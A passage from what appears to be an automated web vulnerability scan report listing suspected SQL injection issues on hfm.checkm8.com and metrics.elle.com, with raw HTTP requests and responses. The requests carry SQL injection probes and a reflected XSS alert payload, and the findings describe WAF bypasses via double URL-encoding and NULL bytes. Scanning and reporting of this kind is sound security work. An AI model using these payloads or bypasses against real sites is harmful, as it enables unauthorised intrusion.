Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:32:49 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=o4Y5Y9wQKLW1caa1gSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:08 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 156176306/1230315612/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.12. http://hfm.checkm8.com/adam/detected [RES parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The RES parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the RES parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21'%20and%201%3d1--%20&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:23 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: A=dqR5Y9wK67ULv9UJ7MTba;Path=/;
Set-cookie: C=o3L6Y9wUS38Scaa7dSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:43 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140303008/1214455850/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21'%20and%201%3d2--%20&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:24 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: C=o3L6Y9wUS38Scaa8dSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:43 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140303008/1214455850/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.13. http://hfm.checkm8.com/adam/detected [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 30093398'%20or%201%3d1--%20 and 30093398'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30093398'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:33:04 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: A=dqR5Y9wKWJSLv9UJ7MTba;Path=/;
Set-cookie: C=okZ5Y9wz8F6ScaaziSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:24 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140138687/1214289938/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=004009887110441923&serial=1000:1:A&&LOC=http://ellegirl.elle.com/&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=22904634731821716&req=fr&&&~=&OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=30093398'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm8dccp=1316276692

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:33:04 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.11 NY-AD1
Set-cookie: C=okZ5Y9wz8F6ScaaAiSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:06:24 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 140138687/1214289938/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.14. http://hfm.checkm8.com/adam/detected [WIDTH parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The WIDTH parameter appears to be vulnerable to SQL injection attacks. The payloads 44066463'%20or%201%3d1--%20 and 44066463'%20or%201%3d2--%20 were each submitted in the WIDTH parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=110644066463'%20or%201%3d1--%20&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:12 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba;Path=/;
Set-cookie: C=oSL6Y9wdWQQ0caa6cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:31 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=110644066463'%20or%201%3d2--%20&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:12 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=oSL6Y9wdWQQ0caa7cSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:31 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.15. http://hfm.checkm8.com/adam/detected [cm8dccp cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detected

Issue detail

The cm8dccp cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the cm8dccp cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:42 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wb858Sv9UJ7MTba;Path=/;
Set-cookie: C=omM6Y9wdWQQ0caaCfSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:25:01 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detected?cat=hfmus.eg.hp.landingpage&page=039873858492717074&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1106&HEIGHT=789&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=7748968311440455&req=fr&&&~=&OS=WIN7&JE=1&UL=en&RES=RS21 HTTP/1.1
Host: hfm.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
Cookie: cm8dccp=1316277291%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:51:43 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: C=omM6Y9wdWQQ0caaDfSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:25:02 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-note: NO-COOKIES-BY-DISPATCHER-PARAMETER
x-internal-id: 153982087/1228215537/2850622218/2591229859
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...
1.16. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.elle.com
Path:   /b/ss/hcfellegirlprod/1/H.15.1/s92564277239143

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/hcfellegirlprod/1/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:15 GMT
Server: Omniture DC/2.0.0
Content-Length: 442
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/hcfellegirlprod/1/H.15.1/s92564277239143 was
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/hcfellegirlprod/1/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:15 GMT
Server: Omniture DC/2.0.0
xserver: www493
Content-Length: 0
Content-Type: text/html

1.17. http://metrics.elle.com/b/ss/hcfellegirlprod/1/H.15.1/s92564277239143 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.elle.com
Path:   /b/ss/hcfellegirlprod/1/H.15.1/s92564277239143

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/hcfellegirlprod/1%00'/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
